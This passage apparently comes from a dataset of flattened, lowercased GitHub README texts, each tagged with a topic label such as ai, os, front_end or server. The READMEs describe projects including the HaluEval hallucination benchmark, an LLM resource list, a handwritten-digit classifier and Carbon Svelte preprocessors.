json wget https raw githubusercontent com facebookresearch opendialkg main data opendialkg csv wget https huggingface co datasets ccdv cnn dailymail blob main cnn stories tgz second we sample 10k samples and generate their hallucinated counterparts by setting the task and sampling strategy seed data the downloaded training sets of hotpotqa opendialkg and cnn daily mail task sampled tasks i e qa dialogue or summarization strategy sampling strategy i e one turn or multi turn one pass and conversational in our paper python generate py seed data hotpot train v1 1 json task qa strategy one turn finally we select the most plausible and difficult hallucinated sample from these two sampling methods the final selected samples will be stored in the data directory task filtered task i e qa dialogue or summarization python filtering py task qa users can use our provided instructions and codes on their own datasets to generate hallucinated samples evaluation in evaluation we randomly sample a ground truth or a hallucinated output for each data for example if the text is a hallucinated answer the llm should recognize the hallucination and output yes which means the text contains hallucinations if the text is a ground truth answer the llm should output no indicating that there is no hallucination task evaluated task i e qa dialogue or summarization model evaluated model e g chatgpt gpt 3 5 turbo gpt 3 davinci cd evaluation python evaluate py task qa model gpt 3 5 turbo analysis based on the samples that llms succeed or fail to recognize we can analyze the topics of these samples using lda task analyzed task i e qa dialogue or summarization result the file of recognition results at the evaluation stage category all all task samples failed task samples that llms fail to recognize hallucinations cd analysis python analyze py task qa result evaluation qa qa gpt 3 5 turbo result json category all license halueval uses mit license license reference please cite the repo if you use the data or code in this repo misc halueval author junyi li and xiaoxue cheng and wayne xin zhao and jian yun nie and ji rong wen title halueval a large scale hallucination evaluation benchmark for large language models year 2023 journal arxiv preprint arxiv 2305 11747 url https arxiv org abs 2305 11747
ai
esp-qrcode
esp qrcode library for esp open rtos https github com superhouse esp open rtos for qr code generation c char mydata http example com qrcode qrcode uint8 t qrcodebytes malloc qrcode getbuffersize qrcode version qrcode inittext qrcode qrcodebytes qrcode version ecc medium mydata qrcode print qrcode print on console free qrcodebytes license mit licensed see the bundled license https github com maximkulkin esp qrcode blob master license file for more details
os
AppDevelopmentCourse_Projects
appdevelopmentcourse projects material for the ios dev lab in engineering school unam based on everyone can code
os
azure-ml
azure machine learning training resources around azure ml https www surveymonkey com r qt7pdht how to use this site this site is intended to be the main resource to an instructor led course but anyone is welcome to learn here the intent is to make this site self guided and it is getting there we recommend cloning this repository onto your local computer with a git based program like github desktop for windows or you may download the site contents as a zip file by going to clone or download at the upper right of this repository modules covered the goal of this course is to cover the following modules ml 101 data science process supvervised vs unsupervised vs semisupervised learning dimensionality reduction building ml experiments using studio evaluation of ml models customizing ml experiments inside studio deploying ml as a service for instructor led we recommend dowloading the site contents or cloning it if you can do so to your local computer follow along with the classroom instructions and training sessions when there is a lab indicated you may find the lab instructions in the labs folder for self study we recommend dowloading the site contents or cloning it if you can do so to your local computer go to decks folder and follow along with the slides when there is a lab indicated you may find the lab instructions in the labs folder structure of this repository site labs hands on exercises decks classroom slides code scripts
machine-learning azure-machine-learning data-science
ai
Move-To-Mobile-Web
move to mobile web mobile web development wiki amp guide guide list traditional fe mobile fe html meta https github com hongru move to mobile web wiki html meta html link css border box https github com hongru move to mobile web wiki css e8 87 aa e9 80 82 e5 ba 94 e5 b8 83 e5 b1 80 border box e7 9a 84 e5 ba 94 e7 94 a8 css background size padding https github com hongru move to mobile web wiki css background size padding e7 9a 84 e4 bd bf e7 94 a8 css media queries https github com hongru move to mobile web wiki media queries css transition animation touch scrolling https github com hongru move to mobile web wiki css transition 7canimation 7coverflow scrolling css ratina https github com hongru move to mobile web wiki retina e7 9a 84 e9 80 82 e9 85 8d js mobile features touch events history deviceratio deviceoritation localstorage devicemotion standalone https github com hongru move to mobile web wiki e3 80 90mobile web e3 80 91js features webapp opoa backbone kissy mobile webapp webapp mvc mvp image css image css mobile web performance experience http click vs touchstart overflow scrolling transition vs style gesture bugs araw dev wiki mobile web test debug chrome macbook safari iphone xcode simulator host more mobile web native js bridge js binding mobile performance charles mtl mf size css css css js combo js cdn mt mtop manifest iconfont css js 302 userid
front_end
dt-ios-core
dreamteam core ios what this is the set of extensions frames sources and other things that could be useful in ios app development this repository will be really helpful in mvvm architecture because it contains bindable property wrapper buttonframe inputframe and other frames tiny view models abstractions of ui controls base and bindable classes boilerplates for your projects router implementation how see the exampleapp examples readme md project for getting help with start working with this library the example includes some basic things how to work with a collection and searching elements inside how to work with text fields and validation requirements ios 12 0 xcode 10 2 swift 5 installation swift package manager the swift package manager https swift org package manager is a tool for automating the distribution of swift code and is integrated into the swift compiler it is in early development but dt core ios does support its use on supported platforms once you have your swift package set up adding dt core ios as a dependency is as easy as adding it to the dependencies value of your package swift swift dependencies package url https github com dreamteammobile dt ios core git branch master cocoapods pod dtcore pod dtcorecomponents license dt core ios is released under the mit license see license license for details
front_end
Handwriting-Number-Classification
handwriting number classification an computer vision project based on cimg library and svm training to classify handwriting number 1 project requirement 1 1 input a photo in which an a4 paper is placed on the desk with some handwriting numbers on 1 2 output a string of the numbers written on the paper like 70026548853 1 3 intermediate processes modify the paper in the photo into a standard a4 paper implement the segmentation of the numbers dividing them into single number use adaboost or svm to train a classifier of the handwriting numbers classify the handwriting numbers with the trained classifier 2 coding environment 3rd party library windows10 vs2015 c cimg library http www cimg eu opencv for extracting features of images libsvm for training testing and predicting http www csie ntu edu tw cjlin libsvm 3 implementation procedure 1 find the 4 vertices of the paper 1 modify the paper into a standard a4 paper 1 segmentation of the numbers in order convert into binary image use vertical histogram to divide the source image into sub image each sub image contains a line of numbers use horizontal histogram to divide the line sub image into several row sub images foreach sub image implement dilation to thicken the number and join the broken ones foreach sub image use connected component labeling algorithm to divide the single number https en wikipedia org wiki connected component labeling foreach sub image save all single number images and a list of their name in txt 1 use libsvm to train model and test and predict the number finally data prepairing convert the mnist http yann lecun com exdb mnist binary data into jpg as well as their labels model training extract the hog features of each image and construct them into svm format in txt scale the features in txt with svm scale exe search the windows folder train the model with svm train exe and get model optional test the data with svm predict exe and see the accuracy modify the training parameter to get the highest accuracy number predicting read the number images you segmented just now and do prediction with the trained model 4 result screenshots 4 vertices of the paper a4 paper modification image text https github com markmohr handwritingnumberclassification raw master resultscreenshots 1 png segmentation of the numbers binary image with dilation divided image circled single number image text https github com markmohr handwritingnumberclassification raw master resultscreenshots 2 png image text https github com markmohr handwritingnumberclassification raw master resultscreenshots 4 dividingimg png divided into single numbers in order as well as an image list in txt image text https github com markmohr handwritingnumberclassification raw master resultscreenshots imagelist png prediction image text https github com markmohr handwritingnumberclassification raw master resultscreenshots predict png 5 some key points 5 1 broken numbers joining comparison before joining after joining image text https github com markmohr handwritingnumberclassification raw master resultscreenshots jointhebrokens png implements use the filters below when doing the dilation during the number segmentation image text https github com markmohr handwritingnumberclassification raw master resultscreenshots filter1 png filtera image text https github com markmohr handwritingnumberclassification raw master resultscreenshots filter2 png filterb do the dilation with filtera twice at first and then filterb once filterb means when at the white pixel search up down one pixel and left right one pixel if meeting a black pixel set the current position to black filtera means when at the white pixel search up down one pixel and left right two pixel count the blacks with the coefficient 1 or 1 1 means subtract one black when meeting a black at left right side at last only if the blacks more than 0 set the current position to black obviously filterb is to thicken the number in all directions leading to the cons that the holes in number 0 6 8 9 with be filled so i propose another simple but useful filter the filtera to deal with such problem it can be seen that the intensity of a white pixel is much relevant to its horizontal neighbors which prevent hole filling to some extent luckily it works well in my experiments 6 code and algorithm explanation 1 segmentation of the numbers broken numbers joining http blog csdn net qq 33000225 article details 73123880 chinese version 1 prediction waiting 7 problems left 1 some numbers are connected to each other and are segmented together into one image 1 from the predict result above we see that most of the 7s and 9s are classified into 1
cimg svm handwriting-numbers handwritten-digit-recognition handwritten-text-recognition
ai
oca-fw-chibios
oca fw chibios build status https travis ci org open canalyzer oca fw chibios svg branch master https travis ci org open canalyzer oca fw chibios open canalyzer firmware based on chibios rtos openocd gdb openocd and gdb are used for development and debugging scripts openocd sh dev null arm none eabi gdb command scripts openocd oca v1 cfg
openocd chibios-rtos can can-bus stm32 chibios nanopb usb
os
204321-204361-Project-Server
plan g server purpose this project meant for 204321 and 204361 class what it s about this project is for cs students to track their grade and immediatly contact adisor when they feel like they about to got retired member juthaporn simmalee 600510537 documentation patteera thisri 600510566 documentation phumdol lookthipnapha 600510569 full stack poomrapee chaiprasop 600510570 frontend tech stack https stackshare io beam41 y3 project how to start the development server 1 first time only type npm install in bash or cmd to install node module used in project 2 if env not exits create it included these setting port any port you like secret secret use by jwt to generate their token timeout jwt token timeout db name of db file regurl the url to reg api server 3 start the server with npm start note this command is for development and not production 4 if main db not exist it will auto generate 4 1 to populate the database with dummy api start dummy server first with npm run start dummy then in env use http localhost 9999 in regurl 4 2 to populate the database with real api just type api path in regurl the api should have http method get and users path should send body like this type string adv or std id string name string surname string password string plans path should send body like this id string student id plans courseid string year number term number 1 2 or 3 grade string uppercase like b courses path should send body like this courseid string coursename string coursecredit number 4 3 open something that can fire http request like postman https www getpostman com and fire post method to server server url server request courses server request users server request plans 5 the server is now ready to use at the port you choose how to build and serve the production server 1 build first with npm run build 2 serve the server with npm run serve note this file is for development and its very big for the distribution branch please visit here https github com beam41 204321 204361 project server tree distribution for the frontend source code please visit here https github com khunpoom 204321 204361 project client
server
awesome-llm-list
large language models llms the world of large language models llms is complex and varied this resource collates together the things that matter helping to make sense of this increasing important topic contents llm chat llm chat papers research papers education education benchmarks benchmarks leaderboards leaderboards open source models open source models commercial models commercial models llm chat everyone knows chatgpt but do you know these others openai chatgpt https chat openai com google bard https bard google com anthropic claude https claude ai inflection pi https pi ai hugging chat https huggingface co chat microsoft bing https www bing com new you https you com perplexity https www perplexity ai chatsonic https writesonic com chat research papers a selection of interesting noteworthy research papers related to llms 2023 a survey of large language models https arxiv org abs 2303 18223 2023 a comprehensive overview of large language models https arxiv org abs 2307 06435 2023 open problems and fundamental limitations of reinforcement learning from human feedback https arxiv org abs 2307 15217 2023 aligning large language models with human a survey https arxiv org abs 2307 12966 ref txt cohere com 2023 toolllm facilitating large language models to master 16000 real world apis https arxiv org abs 2307 16789v1 ref txt cohere com 2023 generative agents interactive simulacra of human behavior https arxiv org pdf 2304 03442 pdf 2023 qlora efficient finetuning of quantized llms https arxiv org abs 2305 14314 2022 scaling instruction finetuned language models https arxiv org abs 2210 11416 2022 constitutional ai harmlessness from ai feedback https arxiv org abs 2212 08073 2022 what language model architecture and pretraining objective work best for zero shot generalization https arxiv org abs 2204 05832 2022 training compute optimal large language models https doi org 10 48550 arxiv 2203 15556 2022 training language models to follow instructions with human feedback https arxiv org abs 2203 02155 2022 emergent abilities of large language models https arxiv org abs 2206 07682 2022 chain of thought prompting elicits reasoning in large language models https arxiv org abs 2201 11903 2021 lora low rank adaptation of large language models https arxiv org abs 2106 09685 2021 the power of scale for parameter efficient prompt tuning https aclanthology org 2021 emnlp main 243 2021 on the opportunities and risks of foundation models https arxiv org abs 2108 07258 2020 language models are few shot learners https arxiv org abs 2005 14165 2020 scaling laws for neural language models https arxiv org abs 2001 08361 2018 bert pre training of deep bidirectional transformers for language understanding https arxiv org abs 1810 04805 2017 attention is all you need https arxiv org abs 1706 03762 education get skilled up with these free and paid for courses prompt engineering guide https github com dair ai prompt engineering guide llm bootcamp https fullstackdeeplearning com llm bootcamp best practices for prompt engineering with openai api https help openai com en articles 6654000 best practices for prompt engineering with openai api lil log prompt engineering https lilianweng github io posts 2023 03 15 prompt engineering prompt engineering guide https learnprompting org docs intro cohere llm university https docs cohere com docs llmu deep learning chatgpt prompt engineering for developers https www deeplearning ai short courses chatgpt prompt engineering for developers deep learning learn the fundamentals of generative ai for real world applications https www deeplearning ai courses generative ai with llms deep learning langchain for llm application development https www deeplearning ai short courses langchain for llm application development princeton cos 597g understanding large language models https www cs princeton edu courses archive fall22 cos597g stanford cs324 large language models https stanford cs324 github io winter2022 benchmarks these various benchmarks are commonly used to compare llm performance arc https arxiv org abs 2305 18354 hellaswag https arxiv org abs 1905 07830 mmlu https arxiv org abs 2009 03300 truthfulqa https arxiv org abs 2109 07958 leaderboards these leaderboards show how llms compare relative to each other hugging face open llm leaderboard https huggingface co spaces huggingfaceh4 open llm leaderboard chatbot arena leaderboard https huggingface co spaces lmsys chatbot arena leaderboard alpaca leaderboard https tatsu lab github io alpaca eval open source models open source models are generally understood to be free to use but some models have restrictive licensing that prohibits commercial use or restricts usage in some way be careful to check out the exact license for the model you want to use making sure you understand exactly what is permissable mistral https mistral ai parameters 7b origin mistral https mistral ai license apache 2 0 https www apache org licenses license 2 0 release date october 2023 paper commercial use possible yes github https huggingface co mistralai training cost comment outperforms llama2 13b longchat https lmsys org blog 2023 06 29 longchat parameters 7b origin uc berkeley cmu stanford and uc san diego https vicuna lmsys org license apache 2 0 https www apache org licenses license 2 0 release date august 2023 paper commercial use possible yes github https github com dachengli1 longchat training cost comment 32k context length qwen https huggingface co qwen parameters 7b origin alibaba license tongyi qianwen https github com qwenlm qwen 7b blob main license release date august 2023 paper commercial use possible yes github https github com qwenlm qwen 7b training cost vicuna 1 5 https vicuna lmsys org parameters 13b origin uc berkeley cmu stanford and uc san diego https vicuna lmsys org license apache 2 0 https www apache org licenses license 2 0 release date august 2023 v1 5 uses llama2 instead of llama of prior releases paper commercial use possible no trained on https sharegpt com conversations that potentially breaches openai license github https github com lm sys fastchat training cost stable beluga https stability ai blog stable beluga large instruction fine tuned models parameters 7b 40b origin stability ai license cc by nc 4 0 https creativecommons org licenses by nc 4 0 release date july 2023 paper commercial use possible no github https huggingface co stabilityai stablebeluga2 training cost llama2 https ai meta com llama parameters 7b 40b origin meta license llama 2 community license agreement https ai meta com resources models and libraries llama downloads release date july 2023 paper https arxiv org abs 2307 09288 commercial use possible yes github https huggingface co meta llama training cost a cumulative of 3 3m gpu hours of computation was performed on hardware of type a100 80gb tdp of 400w or 350w we estimate the total emissions for training to be 539 tco2eq of which 100 were directly offset by meta s sustainability program falcon https falconllm tii ae parameters 7b 40b origin uae technology innovation institute license apache 2 0 https www apache org licenses license 2 0 release date may 2023 paper commercial use possible yes github https huggingface co tiiuae falcon 7b github https huggingface co tiiuae falcon 7b instruct github https huggingface co tiiuae falcon 40b github https huggingface co tiiuae falcon 40b instruct training cost falcon 40b was trained on aws sagemaker on 384 a100 40gb gpus in p4d instances mosaicml mpt 30b https www mosaicml com blog mpt 30b parameters 30b origin open souce from mosaicml license mpt 30b base instruct attribution sharealike 3 0 unported https creativecommons org licenses by sa 3 0 license mpt 30b chat attribution noncommercial sharealike 4 0 international cc by nc sa 4 0 https creativecommons org licenses by nc sa 4 0 release date june 2023 paper commercial use possible yes base instruct no chat github base https huggingface co mosaicml mpt 30b github instruct https huggingface co mosaicml mpt 30b instruct github chat https huggingface co mosaicml mpt 30b chat training cost from scratch 512xa100 40gb 28 3 days 871 000 traingin cost finetune 30b base model 16xa100 40gb 21 8 hours 871 mosaicml mpt 7b https www mosaicml com blog mpt 7b parameters 7b origin open souce from mosaicml claimed to be competitive with llama 7b base storywriter instruct chat fine tunings available license mpt 7b base apache 2 0 https www apache org licenses license 2 0 license mpt 7b storywriter 65k apache 2 0 https www apache org licenses license 2 0 license mpt 7b instruct cc by sa 3 0 https creativecommons org licenses by sa 3 0 license mpt 7b chat cc by nc sa 4 0 https creativecommons org licenses by nc sa 4 0 release date may 2023 paper commercial use possible yes github https huggingface co togethercomputer redpajama incite instruct 7b v0 1 training cost nearly all of the training budget was spent on the base mpt 7b model which took 9 5 days to train on 440xa100 40gb gpus and cost 200k together redpajama incite https www together xyz blog redpajama models v1 parameters 3b 7b origin official version of the open source recreation of llama chat instruction tuned versions license apache 2 0 https www apache org licenses license 2 0 release date may 2023 paper commercial use possible yes github https huggingface co togethercomputer redpajama incite instruct 7b v0 1 training cost the training of the first collection of redpajama incite models is performed on 3 072 v100 gpus provided as part of the incite compute grant on summit supercomputer at the oak ridge leadership computing facility olcf openalpaca https github com yxuansu openalpaca parameters 7b origin an instruction tuned version of openllama license apache 2 0 https www apache org licenses license 2 0 release date may 2023 paper commercial use possible yes github https github com yxuansu openalpaca openllama https github com openlm research open llama parameters 7b origin a claimed recreation of meta s llama without the licensing restrictions license apache 2 0 https www apache org licenses license 2 0 release date may 2023 paper commercial use possible yes github https github com openlm research open llama camel https huggingface co writer camel 5b hf parameters 5b 20b coming origin writer https writer com license apache 2 0 https www apache org licenses license 2 0 release date april 2023 paper commercial use possible yes github https github com basetenlabs camel 5b truss palmyra https huggingface co writer palmyra base parameters 5b 20b coming origin writer https writer com license apache 2 0 https www apache org licenses license 2 0 release date april 2023 paper commercial use possible yes github stablelm https stability ai blog stability ai launches the first of its stablelm suite of language models parameters 3b 7b 15b 65b coming origin stability ai https stability ai license cc by sa 4 0 https creativecommons org licenses by sa 4 0 release date april 2023 paper commercial use possible yes github https github com stability ai stablelm databricks dolly 2 https www databricks com blog 2023 04 12 dolly first open commercially viable instruction tuned llm parameters 12b origin databricks https www databricks com an instruction tuned version of eleutherai pythia license cc by sa 4 0 https creativecommons org licenses by sa 4 0 release date april 2023 paper commercial use possible yes github https github com databrickslabs dolly training cost databricks cite for thousands of dollars and in a few hours dolly 2 0 was built by fine tuning a 12b parameter open source model eleutherai s pythia on a human generated dataset of 15k q a pairs this of course is just for the fine tuning and the cost of training the underlying pythia model also needs to be taken into account when estimating total training cost vicuna https vicuna lmsys org parameters 13b origin uc berkeley cmu stanford and uc san diego https vicuna lmsys org license requires access to llama trained on https sharegpt com conversations that potentially breaches openai license release date april 2023 paper commercial use possible no github https github com lm sys fastchat cerebras gpt https www cerebras net blog cerebras gpt a family of open compute efficient large language models parameters 111m 256m 590m 1 3b 2 7b 6 7b and 13b origin cerebras https www cerebras net license apache 2 0 https www apache org licenses license 2 0 release date march 2023 paper https arxiv org abs 2304 03208 https arxiv org abs 2304 03208 commercial use possible yes stanford alpaca https crfm stanford edu 2023 03 13 alpaca html parameters 7b origin stanford https crfm stanford edu 2023 03 13 alpaca html based on meta s llama license requires access to llama trained on gpt conversations against openai license release date march 2023 paper commercial use possible no github https github com tatsu lab stanford alpaca training cost replicate posted a blog post https replicate com blog replicate alpaca where they replicated the alpaca fine tuning process they used 4x a100 80gb gpus for 1 5 hours for total training cost the cost of training the underlying llama model also needs to be taken into account eleutherai pythia https github com eleutherai pythia parameters 70m 160m 410m 1b 1 4b 2 8b 6 9b 12b origin eleutherai https www eleuther ai license apache 2 0 https www apache org licenses license 2 0 release date february 2023 paper https arxiv org pdf 2304 01373 pdf commercial use possible yes llama https ai facebook com blog large language model llama meta ai parameters 7b 33b 65b origin meta https ai facebook com tools license model weights available for non commercial use by application to meta release date february 2023 paper https arxiv org abs 2302 13971 commercial use possible no training cost meta cite when training a 65b parameter model our code processes around 380 tokens sec gpu on 2048 a100 gpu with 80gb of ram this means that training over our dataset containing 1 4t tokens takes approximately 21 days finally we estimate that we used 2048 a100 80gb for a period of approximately 5 months to develop our models however that cost is for all the different model sizes combined separately in the llama paper meta cite 1 022 362 gpu hours on a100 80gb gpus bloom https bigscience huggingface co blog bloom parameters 176b origin bigscience https bigscience huggingface co license bigscience rail license https bigscience huggingface co blog the bigscience rail license release date july 2022 paper https arxiv org abs 2211 05100 commercial use possible yes google palm https ai googleblog com 2022 04 pathways language model palm scaling to html parameters 540b origin google https www google com license unknown only announcement of intent to open release date april 2022 paper https arxiv org abs 2204 02311 commercial use possible awaiting more information gpt neox 20b https huggingface co eleutherai gpt neox 20b parameters 20b origin eleutherai https www eleuther ai license apache 2 0 https www apache org licenses license 2 0 release date january 2022 paper https aclanthology org 2022 bigscience 1 9 commercial use possible yes github https github com eleutherai gpt neox gpt j https huggingface co eleutherai gpt j 6b parameters 6b origin eleutherai https www eleuther ai license apache 2 0 https www apache org licenses license 2 0 release date june 2021 paper commercial use possible yes google flan t5 https ai googleblog com 2020 02 exploring transfer learning with t5 html parameters 80m 250m 780m 3b 11b origin google https www google com license apache 2 0 https www apache org licenses license 2 0 release date october 2021 paper https arxiv org pdf 2210 11416 pdf commercial use possible yes github https github com google research t5x ibm dromedary https github com ibm dromedary parameters 7b 13b 33b and 65b origin ibm https research ibm com artificial intelligence based on meta s llama license gnu general public license v3 0 release date paper https arxiv org abs 2305 03047 commercial use possible no github https github com ibm dromedary commercial models these commercial models are generally available through some form of usage based payment model you use more you pay more openai https openai com gpt 4 parameters undeclared availability wait list https openai com waitlist gpt 4 api fine tuning no fine tuning yet available or announced paper https arxiv org abs 2303 08774 pricing https openai com pricing endpoints chat api endpoint which also serves as a completions endpoint privacy data from api calls not collected or used to train models https openai com policies api data usage policies gpt 3 5 parameters undeclared gpt 3 had 175b availability ga fine tuning yes fine tuning available through apis paper https arxiv org pdf 2005 14165 pdf pricing https openai com pricing endpoints a variety of endpoints available including chat embeddings fine tuning moderation completions privacy data from api calls not collected or used to train models chatgpt parameters undeclared uses gpt 3 5 model availability ga fine tuning n a consumer web based solution paper pricing https openai com pricing endpoints n a consumer web based solution privacy data submitted on the web based chatgpt service is collected and used to train models https openai com policies api data usage policies ai21labs https www ai21 com jurassic 2 parameters undeclared jurassic 1 had 178b availability ga fine tuning yes fine tuning available through apis paper pricing https www ai21 com studio pricing endpoints a variety of endpoints available including task specific endpoints including paraphrase gramtical errors text improvements summarisation text segmentation contextual answers privacy anthropic https www anthropic com claude parameters undeclared availability waitlist https www anthropic com product fine tuning not standard large enterprise may contact via https www anthropic com earlyaccess to discuss paper https arxiv org abs 2204 05862 pricing https cdn2 assets servd host anthropic website production images apr pricing tokens pdf endpoints completions endpoint privacy data sent to from is not used to train models unless feedback is given https vault pactsafe io s 9f502c93 cb5c 4571 b205 1e479da61794 legal html terms google https google com google bard parameters 770m availability waitlist https bard google com fine tuning no paper pricing endpoints consumer ui only api via palm privacy google palm api parameters upto 540b availability announced but not yet available https blog google technology ai ai developers google cloud workspace fine tuning unknown paper https arxiv org abs 2204 02311 pricing unknown endpoints unknown privacy unknown amazon https aws amazon com amazon titan parameters unknown availability announced but not yet available https aws amazon com bedrock titan ai developers google cloud workspace fine tuning unknown paper pricing unknown endpoints unknown privacy unknown cohere https cohere ai cohere parameters 52b availability ga fine tuning paper pricing https cohere com pricing endpoints a variety of endpoints including embedding text completion classification summarisation tokensisation language detection privacy data submitted is used to train models https cohere com terms of use ibm https www ibm com products watsonx ai granite parameters 13b 20b availability ga granite 13b instruct chat granite 20b code ansible cobol other variants on roadmap fine tuning currently prompt tuning via apis paper https www ibm com downloads cas x9w4o6bm https www ibm com downloads cas x9w4o6bm pricing https www ibm com products watsonx ai pricing https www ibm com products watsonx ai pricing endpoints various endpoints q a generate extract summarise classify privacy ibm curated 6 48 tb of data before pre processing 2 07 tb after pre processing 1t tokens generated from a total of 14 datasets detail in paper https www ibm com downloads cas x9w4o6bm prompt data is not saved by ibm for other training purposes users have complete control in their storage area of any saved prompts prompt sessions or prompt tuned models training cost granite 13b trained on 256 a100 for 1056 gpu hours legal ibm indemnifies customer use of these models on the watsonx platform
ai
carbon-preprocess-svelte
carbon preprocess svelte npm npm npm url github https img shields io github license ibm carbon preprocess svelte color 262626 style for the badge npm downloads to date https img shields io npm dt carbon preprocess svelte color 262626 style for the badge collection of svelte preprocessors https svelte dev docs svelte preprocess for the carbon design system installation yarn sh yarn add d carbon preprocess svelte npm sh npm i d carbon preprocess svelte pnpm sh pnpm i d carbon preprocess svelte usage this library contains the following preprocessors and plugins optimizeimports rewrites carbon svelte imports to their source path in the script block optimizecss rollup plugin that removes unused css using purgecss https github com fullhuman purgecss elements computes carbon tokens https www carbondesignsystem com guidelines themes overview tokens in the style block icons inlines carbon icons https www carbondesignsystem com guidelines icons library in the markup block pictograms inlines carbon pictograms https www carbondesignsystem com guidelines pictograms library in the markup block collectheadings extracts heading elements e g h1 h2 from the markup optimizeimports optimizeimports is a svelte script preprocessor that rewrites base imports from carbon components icons pictograms packages to their source svelte code paths this can greatly speed up compile times during development while preserving typeahead and autocompletion hinting offered by integrated development environments ide like vscode the preprocessor optimizes imports from the following packages carbon components svelte https github com carbon design system carbon components svelte carbon icons svelte https github com carbon design system carbon icons svelte carbon pictograms svelte https github com carbon design system carbon pictograms svelte example diff import button from carbon components svelte import add16 from carbon icons svelte import airplane from carbon pictograms svelte import button from carbon components svelte button svelte import add16 from carbon icons svelte lib add16 svelte import airplane from carbon pictograms svelte lib airplane svelte note a minimum version of carbon preprocess svelte 0 9 0 is required for carbon component svelte 0 63 0 a minimum version of carbon preprocess svelte 0 8 0 is required for carbon icons svelte 11 usage js svelte config js import optimizeimports from carbon preprocess svelte export default preprocess optimizeimports optimizecss optimizecss is a rollup plugin that removes unused carbon css it extracts selectors based on a svelte component s markup and style content and uses purgecss https github com fullhuman purgecss to prune any unused styles usage optimizecss should be added to the list of vite plugins take care to only run the plugin when building for production js svelte config js import adapter from sveltejs adapter static import optimizecss from carbon preprocess svelte export default kit adapter adapter vite plugins process env node env production optimizecss api ts interface optimizecssoptions safelist standard array regexp string deep regexp greedy regexp elements elements is a svelte style preprocessor that rewrites carbon design system tokens https www carbondesignsystem com guidelines themes overview tokens to their computed values the purpose is to use design system token names e g interactive 01 instead of hardcoded values e g 0f62fe before svelte style h1 h2 font weight semibold background ui 01 div font expressive heading 01 transition background easing standard productive media between 321px and md div color blue 60 style after svelte style h1 h2 font weight 600 background f4f4f4 div font size 0 875rem font weight 600 line height 1 25 letter spacing 0 16px transition background cubic bezier 0 2 0 0 38 0 9 media between 321px and md div color 0f62fe style usage js svelte config js import elements from carbon preprocess svelte export default preprocess elements api ts interface elementsoptions specify the carbon theme setting to all will also enable cssvars default white theme white g10 g90 g100 all set to true for tokens to be re written as css variables automatically set to true if theme is all example spacing 05 var cds spacing 05 ui 01 var cds ui 01 default false cssvars boolean icons icons is a svelte markup preprocessor that inlines carbon svg icons https www carbondesignsystem com guidelines icons library the only required attribute is name which represents the module name of the icon refer to carbon icons svelte icon index md https github com carbon design system carbon icons svelte blob master icon index md for a list of supported icons example diff icon name add16 svg xmlns http www w3 org 2000 svg viewbox 0 0 32 32 fill currentcolor focusable false preserveaspectratio xmidymid meet width 16 height 16 path d m17 15l17 8 15 8 15 15 8 15 8 17 15 17 15 24 17 24 17 17 24 17 24 15z path svg usage js svelte config js import icons from carbon preprocess svelte export default preprocess icons pictograms pictograms is a svelte markup preprocessor that inlines carbon svg pictograms https www carbondesignsystem com guidelines pictograms library the only required attribute is name which represents the module name of the pictogram refer to carbon pictograms svelte pictogram index md https github com carbon design system carbon pictograms svelte blob master pictogram index md for a list of supported pictograms example diff pictogram name airplane svg xmlns http www w3 org 2000 svg viewbox 0 0 32 32 fill currentcolor focusable false preserveaspectratio xmidymid meet width 64 height 64 path d m22 31 36c 0 038 0 0 076 0 007 0 114 0 019l16 29 38l 5 886 1 962c 0 11 0 035 0 231 0 018 0 324 0 05 c9 696 31 225 9 64 31 115 9 64 31v 2c0 0 104 0 044 0 202 0 123 0 271l3 877 3 393v5 169c0 1 419 0 594 4 529 2 36 4 529 s2 36 3 11 2 36 4 529v5 166l2 279 1 759v10h0 721v2 65l2 279 1 759v12h0 721v2 965l4 859 3 75c0 089 0 068 0 141 0 174 0 141 0 285 v4 5c0 0 128 0 068 0 246 0 179 0 311c 0 112 0 066 0 247 0 065 0 359 0 003l 10 458 5 916l 0 004 7 439l3 877 3 393 c0 078 0 068 0 123 0 167 0 123 0 271v2c0 0 115 0 056 0 225 0 149 0 292c22 148 31 337 22 074 31 36 22 31 36z m16 28 64 c0 039 0 0 077 0 007 0 114 0 019l5 526 1 843v 1 338l 3 877 3 393c 0 078 0 068 0 123 0 167 0 123 0 271l0 005 8 22 c0 0 128 0 068 0 246 0 179 0 311c0 112 0 064 0 247 0 065 0 359 0 002l10 457 5 916v 3 706l 10 859 8 38 c 0 089 0 068 0 141 0 174 0 141 0 285v5 169c0 1 33 0 562 3 81 1 64 3 81c 1 077 0 1 64 2 48 1 64 3 81v25 5 c0 0 104 0 044 0 202 0 123 0 271l 3 877 3 393v1 338l5 526 1 843c15 923 28 646 15 961 28 64 16 28 64z m3 23 86 c 0 062 0 0 125 0 017 0 18 0 049c 0 111 0 064 0 18 0 183 0 18 0 312v19c0 0 112 0 052 0 218 0 141 0 286l4 859 3 721v12h0 72 v2 441l2 28 1 746v10h0 72v2 873c0 0 112 0 052 0 218 0 141 0 286l3 36 19 178v3 699l8 46 4 884l0 36 0 623l 9 5 195 c3 125 23 844 3 062 23 86 3 23 86z path svg usage js svelte config js import pictograms from carbon preprocess svelte export default preprocess pictograms collectheadings collectheadings extracts heading elements from markup with an optional callback to modify the source content this can be used to create a table of contents example markup svelte main toc h1 id h1 heading 1 h1 h2 id h2 strong heading strong 2 h2 h3 heading 3 h3 main extracted headings js const headings id h1 text heading 1 level 1 id h2 0 text heading 2 level 2 id h2 1 text heading 2 level 2 id undefined text heading 3 level 3 usage in the following example we create a table of contents from the h2 elements in a svelte file in the aftercollect callback we replace toc with the table of contents js svelte config js import collectheadings from carbon preprocess svelte export default preprocess collectheadings aftercollect headings content const toc headings filter heading heading level 2 map item li a href item id item text a li join return content replace toc ul toc ul api js interface collectheadingsoptions specify the filename pattern to process defaults to files ending with svelte default svelte test regexp optional callback to transform the content after extracting all headings aftercollect headings array id string text string level 1 2 3 4 5 6 content string string include include prepends or appends arbitrary content to the script and markup blocks example diff script import codesnippet from carbon components svelte import onmount from svelte script toc h1 title h1 p summary p usage in the above example we prepend script content that imports the codesnippet component from carbon components svelte in the markup we prepend toc and append p summary p js svelte config js import include from carbon preprocess svelte export default preprocess include script content import codesnippet from carbon components svelte markup content toc content p summary p behavior append api by default the include preprocessor will prepend content to the content block set behavior to append to append the content js interface preprocessincludeoptions specify the filename pattern to process defaults to files ending with svelte default svelte test regexp script array specify the content the prepend or append example import codesnippet from carbon components svelte content string specify the filename pattern to process defaults to files ending with svelte default svelte test regexp specify whether the content should be prepended or appended default prepend behavior prepend append markup array specify the content the prepend or append example ul table of contents ul content string specify the filename pattern to process defaults to files ending with svelte default svelte test regexp specify whether the content should be prepended 